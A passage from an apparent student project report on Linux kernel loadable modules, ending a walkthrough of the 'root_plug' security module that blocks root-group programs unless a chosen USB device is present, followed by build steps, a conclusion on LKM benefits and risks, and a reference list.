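        if (dev->children[child] != NULL &&
            demo_match(dev->children[child], vendor, product) == 0)
            return 0;
    }
    return -ENODEV;
}
```

    Empty hub ports are represented by NULL children and are skipped, just as the original loop skips unset entries.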
    
    



    Specifying a USB Device

    Because every user has different types of USB devices, specifying the device to look for must be done in a simple manner. All USB devices have a specific vendor and product ID. You can see these values by using the lsusb or usbview program when there are USB devices plugged in to your system. This information is also shown in the /proc/bus/usb/devices file, in the lines starting with "P:". See the Documentation/usb/proc_usb_info.txt file for more information on how the data in this file is presented.

    The match_device() function looks to see if the value of the specific device matches the vendor_id and product_id variables. These variables are defined in the code as:

    
    static int vendor_id = 0x0557;
    static int product_id = 0x2008;
    
    MODULE_PARM(vendor_id, "h");
    MODULE_PARM_DESC(vendor_id, 
                "USB Vendor ID of device to look for");
    
    MODULE_PARM(product_id, "h");
    MODULE_PARM_DESC(product_id, 
               "USB Product ID of device to look for");
    


    This allows the module to be loaded with the vendor and product ID specified on the command line. For example, if you want to specify a USB mouse with vendor ID of 0x04b4 and product ID of 0x0001, the module would be loaded with:

    modprobe root_plug vendor_id=0x04b4 product_id=0x0001

    If no vendor or product ID is specified on the module load command line, the code defaults to looking for a generic USB to serial converter with a vendor ID of 0x0557 and a product ID of 0x2008.
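
    The interplay between built-in defaults and load-time overrides can be imitated in user space. The sketch below is not how the module loader itself works; struct plug_ids and plug_ids_from_args() are hypothetical names made up for this example. It only shows the observable behaviour: a name=value option replaces the default, and a missing option leaves the default in place.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical container for the two module parameters. */
struct plug_ids {
    int vendor_id;
    int product_id;
};

/*
 * Start from the defaults used in the module source and override them
 * with any "vendor_id=..." or "product_id=..." option that is supplied.
 * Unknown options are ignored.
 */
static struct plug_ids plug_ids_from_args(int argc, const char *const argv[])
{
    struct plug_ids ids = { 0x0557, 0x2008 };   /* defaults from the text */
    int i;

    for (i = 0; i < argc; ++i) {
        /* base 0 lets strtol() accept the 0x prefix used on the command line */
        if (strncmp(argv[i], "vendor_id=", 10) == 0)
            ids.vendor_id = (int)strtol(argv[i] + 10, NULL, 0);
        else if (strncmp(argv[i], "product_id=", 11) == 0)
            ids.product_id = (int)strtol(argv[i] + 11, NULL, 0);
    }
    return ids;
}
```

    Passing the two options from the modprobe example gives 0x04b4 and 0x0001; passing no options gives the defaults 0x0557 and 0x2008.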



    Building the Module

    Finally, we need to add our module to the kernel build process. This is done by adding the following line to the security/Config.in file:

    tristate 'Root Plug Support' CONFIG_SECURITY_ROOTPLUG

    And the following line to the security/Makefile file:

    obj-$(CONFIG_SECURITY_ROOTPLUG) += root_plug.o



    These changes allow the user to select this kernel module either to be built into the kernel directly or as a module. Run your favorite *config option to select ``Root Plug Support'', then build the kernel as usual. After the kernel is built and running, we can load the root_plug module by typing (as root):

    modprobe root_plug vendor_id=<YOUR_VENDOR_ID> product_id=<YOUR_PRODUCT_ID>

    Now we can run a program as root with the specified USB device plugged in to the system, and then try it again without the device. With the module loaded and the device removed, the following error occurs on my machine:


    $ sudo ls
    sudo: unable to exec /bin/ls: Operation not permitted


    Plug the device back in, and things should work just fine.



    But Is It Secure?




    This example shows how powerful and simple the LSM interface can be. With one hook, any program with the root group ID is prevented from running unless a device is physically present in the system.
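
    The decision made by that one hook can be summarised in a few lines of ordinary C. This is a user-space sketch of the rule described above, not the module's actual hook: rootplug_decide(), device_lookup_fn, device_present() and device_absent() are hypothetical names, and the lookup function stands in for the USB search shown earlier.

```c
#include <errno.h>

/* Stand-in for the USB search: returns 0 if the device is found. */
typedef int (*device_lookup_fn)(void);

/* Two fixed lookups, used only to exercise the rule below. */
static int device_present(void) { return 0; }
static int device_absent(void)  { return -ENODEV; }

/*
 * The rule from the text: a program about to run with the root group ID
 * is refused unless the device is plugged in. Everything else is allowed.
 * The lookup is skipped entirely for programs that do not run as gid 0.
 */
static int rootplug_decide(unsigned int egid, device_lookup_fn lookup)
{
    if (egid == 0 && lookup() != 0)
        return -EPERM;      /* reported as "Operation not permitted" */
    return 0;
}
```

    With device_absent as the lookup, a gid 0 program gets -EPERM, which matches the sudo error shown earlier, while a program running under any other group ID is still allowed to start.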


    Using this code, if the device is not present, users are not allowed to log in to the console, as mingetty traditionally runs as root. But users can log in through SSH as normal users, as sshd already was running before the device was removed. Web pages also can be served, and other services that do not run as root (your mail server, database server, etc.) also will function properly. If one of these server programs were broken into, and they tried to spawn a root shell, that root shell would not be allowed to run. This module does not prevent any program already running as root from cloning itself, or keep a program from trying to change the privileges that are currently assigned to it. To check for these things, the task_* functions in the security_operations structure should be used.

    There are probably other methods of taking an existing running program and spawning a root process that this module does not catch. So it is recommended not to use it in a production environment, but rather to treat it as a learning exercise in how to create other LSM code.


Conclusion



    Kernel Loadable Modules are designed to make life easier, especially for users. Linux is part of the open source movement, so its developers look for ways to make the old Unix style more attractive and easier to use; they build things like KDE and other conveniences. Kerneld, for example, was developed to make module handling easier. But remember: the easier and more automated a system is, the more security problems become possible. It is impossible to make a system that is usable by everyone and still secure enough. Modules are a great example of this.

    5.1 Advance Compatibilities


    (i) Modularized Approach: Any module can be linked and unlinked at run time. It is easy for a system programmer to modify or develop a module.

    (ii) Platform Independence: Even if it relies on some specific hardware features, a module does not depend on a fixed hardware platform. Ex: A disk driver module can work on an IBM-compatible PC as well as on Compaq's Alpha.

    (iii) Frugal Main Memory Usage: A module can be linked to the running kernel when its functionality is required and unlinked when it is no longer useful.

    (iv) No Performance Penalty: Once linked in, the object code of a module is equivalent to the object code of the statically linked kernel. A small performance penalty occurs when the module is linked and when it is unlinked. However, this penalty can be compared to the penalty caused by the creation and deletion of system processes in a microkernel OS.

    (v) Enhanced Device Driver Loading

      1. Device-specific code can be encapsulated in a specific module.

      2. Programmers can add new drivers without knowing the kernel source code.

      3. The kernel deals with all devices in a uniform way and accesses them through the same interface.

      4. It is possible to write a device driver as a module that can be dynamically loaded into the kernel without requiring the system to be rebooted. It is also possible to unload a dynamically loaded module if it is no longer needed.

      5. Using the modularized approach to develop driver code is simpler, because it is not only version independent (to some extent) but also user friendly.



    5.2 Considerations

    What LKMs Can't Do

    There is a tendency to think of Modules (LKMs) like user space programs. They do share a lot of their properties, but LKMs are definitely not user space programs. They are part of the kernel. As such, they have free run of the system and can easily crash it.

    Make a system plug & hack compatible

    It is nearly impossible for any administrator to protect a server from every attacker, because the methods of attack are unpredictable. Kernel Loadable Modules are among the most suitable vehicles for such abuse, so we have to understand how they are exploited before we take any steps to secure our servers. In this project I have described some ideas and exploits based on LKMs, and I am also trying to develop some utilities to protect servers from this type of attack.

    5.3 Guidance

    A lot of guidance was needed because this project was completely new. A great deal of help was provided by my project guide Dr. Sarit Pal and Mr. Rudrarup Naskar.

    5.4 Difficulties

    The only difficulty that hindered the project was kernel version incompatibility. Programs that ran without errors on one version (kernel version 2.2.x) failed to do so on other versions (kernel version 2.4.x).

    5.5 Future Scope of Developments

    (I) This modularized approach and run-time kernel patching can be implemented in operating systems other than GNU/Linux for enhanced system performance.

    (II) Many options remain open for developing kernel modules that enhance system performance and capabilities.

    (III) Functionality can be added to turn this work into a full-fledged modular kernel framework that can be used for commercial purposes to develop device drivers.





References


    On Line Documents


    Title: "Linux 2.4 Kernel Internals"
    Author: Tigran Aivazian and Christoph Hellwig.
    URL: http://www.moses.uklinux.net/patches/lki.html
    Keywords: Linux, kernel, booting, SMP boot, VFS, page cache.
    Description: A little book used for a short training course. Covers building the kernel image, booting (including SMP bootup), process management, VFS and more.

    Title: "Linux Device Drivers, 2nd Edition"
    Author: Alessandro Rubini and Jonathan Corbet.
    URL: http://www.oreilly.com/catalog/linuxdrive2/chapter/book/index.html
    Keywords: device drivers, modules, debugging, memory, hardware, interrupt handling, char drivers, block drivers, kmod, mmap, DMA, buses.
    Description: O'Reilly's popular book, now also on-line under the GNU Free Documentation License.

    Title: "Linux Virtual File System"
    Author: Peter J. Braam.
    URL: http://www.coda.cs.cmu.edu/doc/talks/linuxvfs/
    Keywords: slides, VFS, inode, superblock, dentry, dcache.
    Description: Set of slides, presumably from a presentation on the Linux VFS layer. Covers version 2.1.x, with dentries and the dcache.

    Title: "The Linux Kernel"
    Author: David A. Rusling.
    URL: http://www.linuxdoc.org/LDP/tlk/tlk.html
    Keywords: everything!, book.
    Description: On line, 200 pages book describing most aspects of the Linux Kernel. Probably, the first reference for beginners. Lots of illustrations explaining data structures use and relationships in the purest Richard W. Stevens' style. Contents: "1.-Hardware Basics, 2.-Software Basics, 3.-Memory Management, 4.-Processes, 5.-Interprocess Communication Mechanisms, 6.-PCI, 7.-Interrupts and Interrupt Handling, 8.-Device Drivers, 9.-The File system, 10.-Networks, 11.-Kernel Mechanisms, 12.-Modules, 13.-The Linux Kernel Sources, A.-Linux Data Structures, B.-The Alpha AXP Processor, C.-Useful Web and FTP Sites, D.-The GNU General Public License, Glossary". In short: a must have.


    Title: "The Linux Kernel Hackers' Guide"
    Author: Michael K.Johnson and others.
    URL: http://www.linuxdoc.org/LDP/khg/HyperNews/get/khg.html
    Keywords: everything!
    Description: No more Postscript book-like version. Only HTML now. Many people have contributed. The interface is similar to web available mailing lists archives. You can find some articles and then some mails asking questions about them and/or complementing previous contributions. A little bit anarchic in this aspect, but with some valuable information in some cases.

    Title: "Overview of the Virtual File System"
    Author: Richard Gooch.
    URL: http://www.atnf.csiro.au/~rgooch/linux/vfs.txt
    Keywords: VFS, File System, mounting filesystems, opening files, dentries, dcache.
    Description: Brief introduction to the Linux Virtual File System. What is it, how it works, operations taken when opening a file or mounting a file system and description of important data structures explaining the purpose of each of their entries.


    Title: "Dynamic Kernels: Modularized Device Drivers"
    Author: Alessandro Rubini.
    URL: http://www2.linuxjournal.com/lj-issues/issue23/1219.html
    Keywords: device driver, module, loading/unloading modules, allocating resources.
    Description: Linux Journal Kernel Korner article. Here is its abstract: "This is the first of a series of four articles co-authored by Alessandro Rubini and Georg Zezchwitz which present a practical approach to writing Linux device drivers as kernel loadable modules. This installment presents an introduction to the topic, preparing the reader to understand next month's installment".


    Title: "The Devil's in the Details"
    Author: Georg v. Zezschwitz and Alessandro Rubini.
    URL: http://www2.linuxjournal.com/lj-issues/issue25/1221.html
    Keywords: read(), write(), select(), ioctl(), blocking/non blocking mode, interrupt handler.
    Description: Linux Journal Kernel Korner article. Here is its abstract: "This article, the third of four on writing character device drivers, introduces concepts of reading, writing, and using ioctl-calls".


    Title: "Device Drivers Concluded"
    Author: Georg v. Zezschwitz.
    URL: http://www2.linuxjournal.com/lj-issues/issue28/1287.html
    Keywords: address spaces, pages, pagination, page management, demand loading, swapping, memory protection, memory mapping, mmap, virtual memory areas (VMAs), vremap, PCI.
    Description: Finally, the above turned out into a five articles series. This latest one's introduction reads: "This is the last of five articles about character device drivers. In this final section, Georg deals with memory mapping devices, beginning with an overall description of the Linux memory management concepts".


    Title: "Writing Linux Device Drivers"
    Author: Michael K. Johnson.
    URL: http://people.redhat.com/johnsonm/devices.html
    Keywords: files, VFS, file operations, kernel interface, character vs block devices, I/O access, hardware interrupts, DMA, access to user memory, memory allocation, timers.
    Description: Introductory 50-minutes (sic) tutorial on writing device drivers. 12 pages written by the same author of the "Kernel Hackers' Guide" which give a very good overview of the topic.


    Title: "Writing Character Device Driver for Linux"
    Author: R. Baruch and C. Schroeter.
    URL: ftp://ftp.llp.fu-berlin.de/pub/linux/LINUX-LAB/whitepapers/drivers.ps.gz
    Keywords: character device drivers, I/O, signals, DMA, accessing ports in user space, kernel environment.
    Description: 68-page paper on writing character drivers. A little bit old (1993, 1994) although still useful.


    Title: "Analysis of the Ext2fs structure"
    Author: Louis-Dominique Dubeau.
    URL: http://www.nondot.org/sabre/os/files/FileSystems/ext2fs/
    Keywords: ext2, filesystem, ext2fs.
    Description: Description of ext2's blocks, directories, inodes, bitmaps, invariants...


    Title: "Journaling the Linux ext2fs Filesystem"
    Author: Stephen C. Tweedie.
    URL: ftp://ftp.uk.linux.org/pub/linux/sct/fs/jfs/journal-design.ps.gz
    Keywords: ext3, journaling.
    Description: Excellent 8-pages paper explaining the journaling capabilities added to ext2 by the author, showing different problems faced and the alternatives chosen.


    Title: "Linux Kernel Module Programming Guide"
    Author: Ori Pomerantz.
    URL: http://www.linuxdoc.org/LDP/lkmpg/mpg.html
    Keywords: modules, GPL book, /proc, ioctls, system calls, interrupt handlers .
    Description: Very nice 92 pages GPL book on the topic of modules programming. Lots of examples.


    Title: "The Kernel Hacking HOWTO"
    Author: Various Talented People, and Rusty.
    URL: http://www.lisoleg.net/doc/Kernel-Hacking-HOWTO/kernel-hacking-HOWTO.html
    Keywords: HOWTO, kernel contexts, deadlock, locking, modules, symbols, return conventions.
    Description: From the Introduction: "Please understand that I never wanted to write this document, being grossly underqualified, but I always wanted to read it, and this was the only way. I simply explain some best practices, and give reading entry-points into the kernel sources. I avoid implementation details: that's what the code is for, and I ignore whole tracts of useful routines. This document assumes familiarity with C, and an understanding of what the kernel is, and how it is used. It was originally written for the 2.3 kernels, but nearly all of it applies to 2.2 too; 2.0 is slightly different".


    Title: "Kernel Hacking HOWTO"
    Author: Andrew Ebling.
    URL: http://www.kernelhacking.org/docs/kernelhacking-HOWTO/
    Keywords: HOWTO, kernel hacking, getting started, source navigation, kernel debugging, profiling, benchmarking.
    Description: Another kernel hacking howto. More recent than Rusty's.
    Notes: Some TODO sections. Want to help?


    Title: "Linux Kernel Threads in Device Drivers"
    Author: Martin Frey.
    URL: http://www.scs.ch/~frey/linux/kernelthreads.html
    Keywords: threads, creation, stopping, initialization.
    Description: How to start and stop kernel threads in a loadable module.



    BOOKS


    Title: "Linux Device Drivers"
    Author: Alessandro Rubini.
    Publisher: O'Reilly & Associates.

    Title: "Linux Device Drivers, 2nd Edition"
    Author: Alessandro Rubini and Jonathan Corbet.
    Publisher: O'Reilly & Associates.
    Notes: It is also on-line (under the GNU Free Documentation License) at http://www.oreilly.com/catalog/linuxdrive2/chapter/book/index.html

    Title: "The Design of the UNIX Operating System"
    Author: Maurice J. Bach.
    Publisher: Prentice Hall.


    Title: "Programming for the real world - POSIX.4"
    Author: Bill O. Gallmeister.
    Publisher: O'Reilly & Associates, Inc.
    Notes: Though not being directly about Linux, Linux aims to be POSIX. Good reference.


    Title: "Understanding the Linux Kernel"
    Author: Daniel P. Bovet and Marco Cesati.
    Publisher: O'Reilly & Associates, Inc.
    Notes: Further information at http://www.oreilly.com/catalog/linuxkernel/



    Others

    1. Idea conceived: 2001 Linux Kernel Summit.
    2. Detailed description of the design: 2002 USENIX Security Conference (lsm.immunix.org/docs/lsm-usenix-2002/html/).
    3. Technical description of how the LSM interface works (www.linux.org.uk/~ajh/ols2002_proceedings.pdf.gz).